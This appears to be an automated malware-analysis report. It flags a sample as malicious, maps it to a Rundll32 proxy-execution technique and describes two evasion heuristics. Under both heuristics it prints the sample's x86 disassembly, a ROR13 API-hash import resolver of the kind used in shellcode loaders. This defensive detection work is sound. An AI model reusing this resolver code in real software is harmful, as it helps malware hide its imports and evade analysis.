MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1218.011 Signed Binary Proxy Execution: Rundll32
The sample exhibits high-severity heuristic firings related to PEB access and API hash resolution, indicating sophisticated evasion techniques. These methods are commonly employed by malware loaders to obfuscate their actions and avoid static analysis. While no specific document body or script content was extracted, the presence of these advanced evasion techniques strongly suggests the file's purpose is to download and execute a secondary malicious payload.
Heuristics 2
-
PEB access via FS segment (x86) high SC_PEB_ACCESSPEB access via FS segment (x86)
Disassembly
x86 disassembly · validity: code (0.984) — 8/8 branch targets land on an instruction boundary (100% coherence)0003EF36 648b4030 mov eax, dword ptr fs:[eax + 0x30] 0003EF3A 8b400c mov eax, dword ptr [eax + 0xc] 0003EF3D 8b701c mov esi, dword ptr [eax + 0x1c] 0003EF40 ad lodsd eax, dword ptr [esi] 0003EF41 8b6808 mov ebp, dword ptr [eax + 8] 0003EF44 51 push ecx 0003EF45 56 push esi 0003EF46 57 push edi 0003EF47 8b453c mov eax, dword ptr [ebp + 0x3c] 0003EF4A 368b542878 mov edx, dword ptr ss:[eax + ebp + 0x78] 0003EF4F 03d5 add edx, ebp 0003EF51 52 push edx 0003EF52 8b5220 mov edx, dword ptr [edx + 0x20] 0003EF55 03d5 add edx, ebp 0003EF57 33c0 xor eax, eax 0003EF59 33c9 xor ecx, ecx 0003EF5B 41 inc ecx 0003EF5C 8b348a mov esi, dword ptr [edx + ecx*4] 0003EF5F 03f5 add esi, ebp 0003EF61 33ff xor edi, edi 0003EF63 c1cf0d ror edi, 0xd 0003EF66 ac lodsb al, byte ptr [esi] 0003EF67 03f8 add edi, eax 0003EF69 85c0 test eax, eax 0003EF6B 75f6 jne 0x3ef63 0003EF6D 3bfb cmp edi, ebx 0003EF6F 75ea jne 0x3ef5b 0003EF71 5a pop edx 0003EF72 8b5a24 mov ebx, dword ptr [edx + 0x24] 0003EF75 03dd add ebx, ebp 0003EF77 668b0c4b mov cx, word ptr [ebx + ecx*2] 0003EF7B 8b5a1c mov ebx, dword ptr [edx + 0x1c] 0003EF7E 03dd add ebx, ebp 0003EF80 8b048b mov eax, dword ptr [ebx + ecx*4] 0003EF83 03c5 add eax, ebp 0003EF85 5f pop edi 0003EF86 5e pop esi 0003EF87 59 pop ecx 0003EF88 83f901 cmp ecx, 1 0003EF8B 7408 je 0x3ef95 0003EF8D 8bff mov edi, edi 0003EF8F 55 push ebp 0003EF90 8bec mov ebp, esp 0003EF92 83c005 add eax, 5 0003EF95 ff .byte 0xff
-
PEB API-hash resolver high SC_API_HASH_RESOLVERPEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver
Disassembly
x86 disassembly · validity: code (0.984) — 8/8 branch targets land on an instruction boundary (100% coherence)0003EF36 648b4030 mov eax, dword ptr fs:[eax + 0x30] 0003EF3A 8b400c mov eax, dword ptr [eax + 0xc] 0003EF3D 8b701c mov esi, dword ptr [eax + 0x1c] 0003EF40 ad lodsd eax, dword ptr [esi] 0003EF41 8b6808 mov ebp, dword ptr [eax + 8] 0003EF44 51 push ecx 0003EF45 56 push esi 0003EF46 57 push edi 0003EF47 8b453c mov eax, dword ptr [ebp + 0x3c] 0003EF4A 368b542878 mov edx, dword ptr ss:[eax + ebp + 0x78] 0003EF4F 03d5 add edx, ebp 0003EF51 52 push edx 0003EF52 8b5220 mov edx, dword ptr [edx + 0x20] 0003EF55 03d5 add edx, ebp 0003EF57 33c0 xor eax, eax 0003EF59 33c9 xor ecx, ecx 0003EF5B 41 inc ecx 0003EF5C 8b348a mov esi, dword ptr [edx + ecx*4] 0003EF5F 03f5 add esi, ebp 0003EF61 33ff xor edi, edi 0003EF63 c1cf0d ror edi, 0xd 0003EF66 ac lodsb al, byte ptr [esi] 0003EF67 03f8 add edi, eax 0003EF69 85c0 test eax, eax 0003EF6B 75f6 jne 0x3ef63 0003EF6D 3bfb cmp edi, ebx 0003EF6F 75ea jne 0x3ef5b 0003EF71 5a pop edx 0003EF72 8b5a24 mov ebx, dword ptr [edx + 0x24] 0003EF75 03dd add ebx, ebp 0003EF77 668b0c4b mov cx, word ptr [ebx + ecx*2] 0003EF7B 8b5a1c mov ebx, dword ptr [edx + 0x1c] 0003EF7E 03dd add ebx, ebp 0003EF80 8b048b mov eax, dword ptr [ebx + ecx*4] 0003EF83 03c5 add eax, ebp 0003EF85 5f pop edi 0003EF86 5e pop esi 0003EF87 59 pop ecx 0003EF88 83f901 cmp ecx, 1 0003EF8B 7408 je 0x3ef95 0003EF8D 8bff mov edi, edi 0003EF8F 55 push ebp 0003EF90 8bec mov ebp, esp 0003EF92 83c005 add eax, 5 0003EF95 ff .byte 0xff
Open this report in the interactive analyzer, or submit your own file for analysis.